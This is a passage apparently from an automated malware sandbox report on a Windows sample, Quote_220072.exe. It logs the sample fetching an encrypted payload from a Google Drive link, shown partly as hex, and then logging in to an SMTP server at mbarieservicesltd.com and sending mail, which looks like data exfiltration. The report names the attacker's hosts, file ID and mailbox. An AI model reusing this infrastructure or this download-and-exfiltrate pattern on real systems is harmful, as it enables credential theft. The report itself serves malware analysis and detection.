                                                                            Nov 1, 2024 12:15:42.849869013 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.849872112 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.849920034 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.849972963 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.850008965 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.850056887 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:44.671127081 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:44.676314116 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:44.677177906 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:45.398843050 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.399593115 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:45.405009031 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.553205013 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.554178953 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:45.559123039 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.707318068 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.708534956 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:45.713418007 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.981354952 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:45.981822968 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:45.986687899 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.142847061 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.143258095 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.148291111 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.309142113 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.309415102 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.314287901 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.462965012 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.463841915 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.463897943 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.463920116 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.463938951 CET49740587192.168.2.9199.79.62.115
                                                                            Nov 1, 2024 12:15:46.468921900 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.468960047 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.468969107 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.468976974 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.618818045 CET58749740199.79.62.115192.168.2.9
                                                                            Nov 1, 2024 12:15:46.672813892 CET49740587192.168.2.9199.79.62.115
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 1, 2024 12:15:37.719043970 CET5082853192.168.2.91.1.1.1
                                                                            Nov 1, 2024 12:15:37.725857019 CET53508281.1.1.1192.168.2.9
                                                                            Nov 1, 2024 12:15:39.045264006 CET5378753192.168.2.91.1.1.1
                                                                            Nov 1, 2024 12:15:39.052170992 CET53537871.1.1.1192.168.2.9
                                                                            Nov 1, 2024 12:15:44.376378059 CET5273653192.168.2.91.1.1.1
                                                                            Nov 1, 2024 12:15:44.665628910 CET53527361.1.1.1192.168.2.9
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 1, 2024 12:15:37.719043970 CET192.168.2.91.1.1.10x288fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:15:39.045264006 CET192.168.2.91.1.1.10x9847Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:15:44.376378059 CET192.168.2.91.1.1.10x4b3dStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.22A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.26A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.21A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.41A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:14:50.261038065 CET1.1.1.1192.168.2.90x552eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.35A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:15:37.725857019 CET1.1.1.1192.168.2.90x288fNo error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:15:39.052170992 CET1.1.1.1192.168.2.90x9847No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                            Nov 1, 2024 12:15:44.665628910 CET1.1.1.1192.168.2.90x4b3dNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.949738172.217.18.144437888C:\Users\user\Desktop\Quote_220072.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-01 11:15:38 UTC216OUTGET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-11-01 11:15:39 UTC1610INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Fri, 01 Nov 2024 11:15:38 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-DXBv5wptBfS2EyRw6Z13bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.949739142.250.185.1934437888C:\Users\user\Desktop\Quote_220072.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-01 11:15:39 UTC258OUTGET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-11-01 11:15:42 UTC4926INHTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="YrPxinQpmxnkhhlvx179.bin"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 168000
                                                                            Last-Modified: Wed, 30 Oct 2024 08:26:14 GMT
                                                                            X-GUploader-UploadID: AHmUCY1Gdxgcb8xpLkAtczw5wJ6zXt5xVgfvFcvZG3H5tmMuEwZy6XOlQnyAF4uHC75QAr3z6coiiH3dpA
                                                                            Date: Fri, 01 Nov 2024 11:15:42 GMT
                                                                            Expires: Fri, 01 Nov 2024 11:15:42 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=ZBDanQ==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-11-01 11:15:42 UTC4926INData Raw: 77 75 d4 fe 16 eb c6 c5 89 6a ec 51 7c 83 b6 f9 cd 2a 3c d8 d2 5c 27 2d 00 49 43 dc 0c c7 97 8c e1 2f 71 01 d2 4c 91 82 19 9e 33 71 bc 6d 93 4f c3 35 95 d9 00 43 f6 03 5c ad 4d 30 f4 bc 74 6a 6b 54 65 ef 4b 0f f2 95 a7 d4 f9 a5 07 ce ea 66 d6 b4 c5 c8 af d9 cb 51 30 48 29 93 3c f3 b8 bf 94 55 7f 52 21 18 f8 99 bd 7a 70 e6 16 3e 51 72 eb 7c de 9a fe a9 13 91 a8 93 65 0f dd ae e8 22 f0 f2 d7 81 1a 12 77 e6 b0 9c 55 17 93 8e 01 e7 54 49 45 1d 1f 1d 7d 5d 36 9f 28 9d 0a a8 e3 d1 01 97 06 19 aa ab a5 ef 0f e1 12 20 6c 0c ad 9c e0 b9 0d c9 6b 97 d4 75 c7 b1 42 9f 80 e9 5d a6 93 29 94 f0 d0 90 ce 3f ab e7 fa 25 61 f5 ba 9d d7 12 ec 07 50 55 9e 70 5a e3 96 1c 79 af b1 3b af 3a f9 71 ac 85 fa 97 5d 83 1c 75 65 29 73 a9 56 29 0e 15 4f e0 29 48 30 4f 48 2c 69 42 a2
                                                                            Data Ascii: wujQ|*<\'-IC/qL3qmO5C\M0tjkTeKfQ0H)<UR!zp>Qr|e"wUTIE}]6( lkuB])?%aPUpZy;:q]ue)sV)O)H0OH,iB
                                                                            2024-11-01 11:15:42 UTC4846INData Raw: 44 dc b8 46 2a 52 fc b9 4d a6 eb 80 b7 3c a2 33 cb 7d a0 6e cd fe 62 43 a8 6a f0 13 df 47 45 e9 f1 3e 4b 68 ef 6f f0 0f a6 10 c5 de 68 d5 6b 4d f1 9d c8 cc 8c a2 f1 53 63 da 29 52 ed fb 7b 67 94 9d ab 36 09 34 06 40 b3 96 89 c3 8f bf 1c 7e 11 61 83 b4 31 43 c8 d3 ef 6d 78 d0 fc 9b 48 ae 49 2b 23 72 c2 fb ee a9 6e 64 96 83 d6 9e df c4 02 04 53 b6 ee e8 cc 59 fb d0 a1 18 99 1a 6f 84 9d 4b db 65 b3 1b 67 a5 73 4b b8 0f ee 63 1f 73 d7 07 80 3f 00 56 8d 78 7f a1 e0 1d cc e6 6f 8f 71 89 77 1c d7 c8 74 3c 44 6e db 2d 49 39 e1 db 77 b8 84 2b c3 2f e8 ae 19 28 90 ff 39 f3 9a 02 c0 7d 12 0a 02 dc 41 a1 6c 9d 72 09 08 e2 0d 1b c3 02 0e cc 04 37 1d eb 76 7f b4 c6 95 f9 48 e1 50 44 0c 41 cd 83 96 9d 91 fd ab 72 fb 89 25 28 df ff 5e 46 6e e0 6b e4 ee cb 24 5f d0 7c b7
                                                                            Data Ascii: DF*RM<3}nbCjGE>KhohkMSc)R{g64@~a1CmxHI+#rndSYoKegsKcs?Vxoqwt<Dn-I9w+/(9}Alr7vHPDAr%(^Fnk$_|
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: cc f3 08 59 5f a9 0d 35 8c 31 23 76 33 30 cd 86 b1 ad 0d 90 64 9b 5f 43 69 6d 44 f8 3f a4 48 a5 7c fc d3 bb aa 71 79 98 ef ea 42 b1 2d ad 69 b4 39 80 7d fb 79 2d 43 14 14 56 45 0f 33 16 d5 22 37 6a c1 2d 65 a3 fc 04 04 f6 c7 58 44 dd d7 8b 9b 71 cd af 5e 90 21 c1 18 c8 63 15 1a 59 fe 89 3b d5 0b 38 86 52 36 bb 47 93 cb 01 d5 d8 35 36 ed 86 55 71 9a d7 b6 83 d8 b4 52 e5 75 12 ba 8c f3 53 1a 71 44 dc f1 df 1c 57 f0 e4 76 e6 61 39 78 85 a0 ad 30 5f af 9f 36 51 8c e6 a1 a1 1d 59 44 5b c0 a4 59 3e 84 a7 45 23 04 34 d8 23 46 de 71 81 2e cd 57 0f 75 60 0c 8e 03 e2 c0 4a 2b 8a 2b 23 ca 68 d2 6a 2b 3e 0a f9 cc 4e 60 79 c3 7c f5 42 7d 25 29 16 1a fd 1f 8c 83 6e 73 bb f6 90 e4 1f 82 03 c4 cd 08 e1 41 d7 88 f4 c8 81 5c cf 73 c7 fc 5f 97 ce f3 b0 5c 65 cb a4 16 dc 49
                                                                            Data Ascii: Y_51#v30d_CimD?H|qyB-i9}y-CVE3"7j-eXDq^!cY;8R6G56UqRuSqDWva9x0_6QYD[Y>E#4#Fq.Wu`J++#hj+>N`y|B}%)nsA\s_\eI
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: ff 5c e3 76 df e0 55 90 d7 f5 b0 5c 65 c7 89 67 1d 8c 00 ca a8 8d 82 e0 67 2c 49 3e 89 21 c1 f6 f0 a2 e4 3f c4 bf 7f 9f b7 ec 6f e1 10 75 91 a0 69 27 4f d8 d5 0e 35 d4 aa 1e 75 64 60 d9 93 40 fe 70 52 75 99 7e 4c 91 bc 3f f6 fc 27 00 40 68 3f a4 2b 3b b1 44 3e 26 15 b7 7c 4d a0 48 07 7c 31 4f 54 ee d6 f8 2b f9 52 5c 6c 56 ca b0 4f 0a 2c 6d 2d df 8f 7e e6 76 fe d1 6b c5 cf b5 97 5f 92 a7 41 83 aa 7c 6f a9 a5 f4 1e b3 90 1e 00 e2 a0 9b ca 2f 56 fa 40 48 f8 79 3a c9 86 8f 69 00 ae a2 7a 82 e9 30 b0 ad 03 a7 2e 55 06 6a 8a 4f 14 97 95 94 49 d7 76 3d 8e a4 98 b5 6f 4d 46 69 0e b4 81 3c de 05 61 78 a4 8c b7 98 31 e3 90 49 43 29 1b 99 b6 35 ec 4c 2f 82 3a c5 ef c9 36 62 06 a2 22 d3 c1 f0 62 9c 34 fc ea 26 7c 2e d6 76 2d d6 07 da 92 25 0d 14 83 26 40 15 03 33 eb
                                                                            Data Ascii: \vU\egg,I>!?oui'O5ud`@pRu~L?'@h?+;D>&|MH|1OT+R\lVO,m-~vk_A|o/V@Hy:iz0.UjOIv=oMFi<ax1IC)5L/:6b"b4&|.v-%&@3
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: 16 82 74 2a cf 7d a4 93 09 09 32 86 61 23 29 2d 03 98 d3 cd fa 4b 73 29 9b 68 e1 e9 a7 da 28 74 0b 6b 46 01 70 dc 10 db 4b 12 17 42 1e 0a a7 19 37 29 77 b6 b5 c1 88 a3 a4 c7 2c 04 66 4f c9 c7 96 e0 13 bf 50 74 32 0a 54 9c cc d7 49 8d b8 a2 91 53 4b 0f 41 fc bd 26 04 e4 cc 68 8e 34 f6 9f fc a6 a7 f8 37 99 e6 6e b4 cf e8 fa 1f a8 6d 58 17 2b 93 3a 9c 39 bf 94 5f 6e 71 01 60 3e fa 81 52 2f e4 16 38 22 f2 eb 7c d4 ba f2 6f 70 ad 80 cc 67 0f 5b c1 69 22 fe e7 7c ac 3a 74 b9 48 ad 0c 0b 59 5e a9 26 0f 3d 3a 6f 4d 8b b5 79 13 7f ad 0a fe 6d a9 0c be 75 bd 75 5f aa 5a 17 e2 13 a0 23 02 28 45 8d 3c 8d d6 63 b8 2a 1b d9 7f e9 a0 61 8c 89 ff 4e ac fb b9 96 f0 9c 80 c5 ef d5 dd 46 47 49 db ba 9d dd 3a c3 07 b0 5f 8f 7a 43 ee b7 17 16 30 b3 3b a5 41 79 71 ac 8f 7b 80
                                                                            Data Ascii: t*}2a#)-Ks)h(tkFpKB7)w,fOPt2TISKA&h47nmX+:9_nq`>R/8"|opg[i"|:tHY^&=:oMymuu_Z#(E<c*aNFGI:_zC0;Ayq{
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: 8b 62 55 e2 b7 18 6e d7 b2 17 ad 19 fb 5a 44 9a dc bf b4 27 1e 7f 45 a7 b7 ca 6a 01 51 17 4f e6 41 42 30 6f 42 26 76 5a 8a 98 1b 7b f7 f6 28 66 55 2b 64 da 5e 8a 7a 76 08 c4 95 c7 03 c8 de 11 ff 8d 4c c0 9d fa 41 55 22 82 18 4c 13 3f 70 9e 93 39 9c 5f 31 76 51 b2 08 35 b6 95 fe a2 17 84 a5 c3 b5 a7 0f a7 6c 33 6b 20 bd ee a8 e2 bc 5a de ff 08 be 1e 0e a1 db bd 0b 60 9a 6a 3e 34 dd f6 77 ac 1b 2a c0 8f d7 54 ed 0b f1 2d f9 72 09 56 35 f8 a5 49 dc b1 4e d2 44 2e b7 66 af c0 e9 bb 3c a8 4d d3 65 b3 6a c1 f5 69 5e 5f 71 37 8b f3 57 47 92 e0 4d 4a 6c e1 7b dd 1c a3 12 c6 56 73 d8 6d 2b 91 62 c9 e6 9e a7 ef 4f 67 49 15 73 29 b4 45 64 c9 b4 3d 1a 29 fb d0 13 8c be a4 c1 8f b9 0f 56 e7 71 95 bf 66 57 c9 d3 e9 7c 74 ce 13 9e fe 87 b5 95 23 4e ea a0 e6 b1 65 44 71
                                                                            Data Ascii: bUnZD'EjQOAB0oB&vZ{(fU+d^zvLAU"L?p9_1vQ5l3k Z`j>4w*T-rV5IND.f<Meji^_q7WGMJl{Vsm+bOgIs)Ed=)VqfW|t#NeDq
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: 7c 74 e7 9e 58 07 9b 63 0f 42 72 c4 f6 8b 6d 62 64 99 8a 26 8d fd 2a 16 6f 30 b6 ef 83 dd 5e d3 d9 89 3c b2 10 7e 9a 9b 53 c6 b3 b9 37 61 a9 58 1a 91 77 de ff d5 43 76 04 ac 3d 17 5b bc d4 7f a8 f3 8c 6f ca 60 82 5a 73 49 1c d1 d1 07 3e 42 46 7a 21 53 3e f0 d5 49 92 84 07 c6 3c f7 ab 31 82 8c 01 32 ce 90 09 41 94 e7 1c 2a 83 50 91 69 8b 28 c4 09 e2 03 08 ca 02 11 c2 14 93 1c eb 70 6c b7 c0 61 d4 6c ef 43 35 00 c7 cd 87 96 5b 9f db 7c 68 14 85 1e 60 ce 8e 2c 4b 7f e8 ed 8a f9 9d db a0 04 64 a7 ef 2c 1f c2 10 28 a4 a8 d1 83 35 5e a8 2c ba 79 25 37 15 ab d3 51 9a 0f c8 42 4a f0 f9 23 14 43 af 14 cb 8d 68 2b 2b f0 19 94 87 b1 ab 16 98 64 9d 49 4b 9e 40 44 fa 44 df 48 fb 7a c3 b8 d3 aa 7b 71 a0 54 28 27 95 fb f3 47 b9 3d d3 96 fb 79 2f 06 45 16 2d c9 16 39 12
                                                                            Data Ascii: |tXcBrmbd&*o0^<~S7aXwCv=[o`ZsI>BFz!S>I<12A*Pi(plalC5[|h`,Kd,(5^,y%7QBJ#Ch++dIK@DDHz{qT('G=y/E-9
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: d3 bd 48 a8 35 61 15 fe 68 2d 3d 5e 34 31 8c 75 05 3e 8c 36 c9 6d c5 24 65 b4 fc 6b ae ec 39 53 7b d9 ed 8f df 6e e7 af 47 b3 2c d7 58 d8 5b 40 1a 59 fe 89 22 ce 30 ee 95 53 3e 43 57 b8 ad af c3 f0 65 25 e5 91 47 5b 88 12 c2 41 f1 c7 5e e7 08 06 14 8c f7 4f 61 e7 45 ca 05 c6 07 5f d6 f3 4b 84 71 1c 25 fc db ab 5f f5 c0 cf 3c 45 78 fe bd 5f 1a 2f 83 a1 ec a7 59 2e 9d b6 55 2a e8 1e b6 30 7c cd 48 a9 17 c4 4d 37 66 69 2c 20 03 e2 cb 66 01 8a 35 38 e8 3e 7c 6c 33 ca 7f dc cf 64 62 60 c9 6b e8 32 15 1e 0d 25 52 23 1f 8c 8b 04 05 b3 de 02 be 37 af 6c f1 cb 24 fc 54 cc 9a e5 86 6c 4f f2 62 d6 fa db fe fa 5c 48 2e 3a c8 8f 12 e4 87 11 c7 d6 f4 a3 db a2 50 55 1d d6 24 de e1 61 0d c8 31 c8 b8 e5 9f b7 eb 17 1d 35 75 97 be 68 3f 5e cc dc 13 e3 7a 86 10 79 8a d4 ca
                                                                            Data Ascii: H5ah-=^41u>6m$ek9S{nG,X[@Y"0S>CWe%G[A^OaE_Kq%_<Ex_/Y.U*0|HM7fi, f58>|l3db`k2%R#7l$TlOb\H.:PU$a15uh?^zy
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: 0e b5 f4 83 53 73 4d df cc 2d c1 d5 86 1a 78 0e d6 d5 93 57 9d 1c ad 74 a6 ff 40 9a bc 2e fa d0 e1 80 6c 66 39 c6 61 2b b4 55 3e ca 15 b7 7c 41 8c 52 03 6a 2b 72 c5 72 fb f6 2b 99 e5 4d 68 41 a0 d8 21 97 2b 72 03 c7 87 68 ff 4a 51 d0 47 c1 e4 8f 8c 59 ba f0 2e f2 a1 51 29 a7 b8 d7 4f b4 8f 18 d3 d4 8a e6 bf 5d aa fc 53 47 86 01 2a cf ef ec 65 0b a8 b4 6c b2 10 5e e4 a2 05 d2 89 5c 17 64 8a 44 14 97 95 9a 62 de 5e a6 96 5a 9f f6 11 3f 36 6e 1f bb e4 a3 d5 05 6c bb 59 ab 45 95 26 95 06 11 50 2a 65 ed a6 31 85 c9 25 82 3b cd b9 09 58 b1 f7 5b 57 01 df e3 68 f3 54 f1 f3 de 62 12 d6 71 02 53 0e 24 99 25 08 08 e3 a4 40 04 09 47 64 d2 e7 90 cc 59 35 82 75 c2 d8 b0 04 b5 49 0f 3d 37 72 76 af 9a d1 53 0b 3b 6d c6 65 8d cf 69 07 73 b0 cd 53 84 a3 bf da 11 da bf a5
                                                                            Data Ascii: SsM-xWt@.lf9a+U>|ARj+rr+MhA!+rhJQGY.Q)O]SG*el^\dDb^Z?6nlYE&P*e1%;X[WhTbqS$%@GdY5uI=7rvS;meisS
                                                                            2024-11-01 11:15:42 UTC1378INData Raw: 1a 69 9b 3b 79 2f 7c b7 d9 46 e7 6d ae d6 05 28 96 bd aa fb b4 b7 13 a9 54 89 db 65 9b 96 ec 31 e0 db 84 8a c4 5c 42 16 3e 12 6d 26 0e ff fc 4d d1 f4 b3 b7 c7 fc 7b f8 20 ef 4c 6e b4 c5 c9 bf d9 cb 51 70 77 29 d6 b8 f3 be be 94 55 7e 41 11 1a f8 db bd 7a 70 c3 16 3e 40 64 e0 57 ea 9a f9 be ed 90 84 99 67 0c 2e 7f e8 22 f4 e7 75 84 1a a1 66 d5 90 08 5d 5d 5a c0 87 8f 3d 30 7c 66 6d 75 0c d1 56 de 0b fe 7c cd 8d b9 6c 49 65 50 88 f2 d2 aa e5 8e 79 6f fb 43 fe b6 a7 88 6b 84 41 9a d9 75 e1 91 10 41 e3 d5 75 f9 c1 6c 92 d8 3b 91 cd 39 e8 c3 44 3d ea f5 ba 99 fd 30 ee 04 cd de 9c 71 55 c8 a6 07 49 2d b3 34 ad 32 f9 57 ac 85 eb 81 20 32 35 23 65 18 66 b1 a8 28 22 32 6f ad b7 2b 0c 47 17 2e 69 46 8a 3f 1b 7b f7 f6 38 7c 55 2b 64 da 5e 8a 7a 76 08 c4 95 c7 20 b4
                                                                            Data Ascii: i;y/|Fm(Te1\B>m&M{ LnQpw)U~Azp>@dWg."uf]]Z=0|fmuV|lIePyoCkAuAul;9D=0qUI-42W 25#ef("2o+G.iF?{8|U+d^zv


                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Nov 1, 2024 12:15:45.398843050 CET58749740199.79.62.115192.168.2.9220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 01 Nov 2024 16:45:45 +0530
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Nov 1, 2024 12:15:45.399593115 CET49740587192.168.2.9199.79.62.115EHLO 035347
                                                                            Nov 1, 2024 12:15:45.553205013 CET58749740199.79.62.115192.168.2.9250-md-54.webhostbox.net Hello 035347 [173.254.250.82]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Nov 1, 2024 12:15:45.554178953 CET49740587192.168.2.9199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                                            Nov 1, 2024 12:15:45.707318068 CET58749740199.79.62.115192.168.2.9334 UGFzc3dvcmQ6
                                                                            Nov 1, 2024 12:15:45.981354952 CET58749740199.79.62.115192.168.2.9235 Authentication succeeded
                                                                            Nov 1, 2024 12:15:45.981822968 CET49740587192.168.2.9199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                                            Nov 1, 2024 12:15:46.142847061 CET58749740199.79.62.115192.168.2.9250 OK
                                                                            Nov 1, 2024 12:15:46.143258095 CET49740587192.168.2.9199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                                            Nov 1, 2024 12:15:46.309142113 CET58749740199.79.62.115192.168.2.9250 Accepted
                                                                            Nov 1, 2024 12:15:46.309415102 CET49740587192.168.2.9199.79.62.115DATA
                                                                            Nov 1, 2024 12:15:46.462965012 CET58749740199.79.62.115192.168.2.9354 Enter message, ending with "." on a line by itself
                                                                            Nov 1, 2024 12:15:46.463938951 CET49740587192.168.2.9199.79.62.115.
                                                                            Nov 1, 2024 12:15:46.618818045 CET58749740199.79.62.115192.168.2.9250 OK id=1t6pd4-003nCJ-1F

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

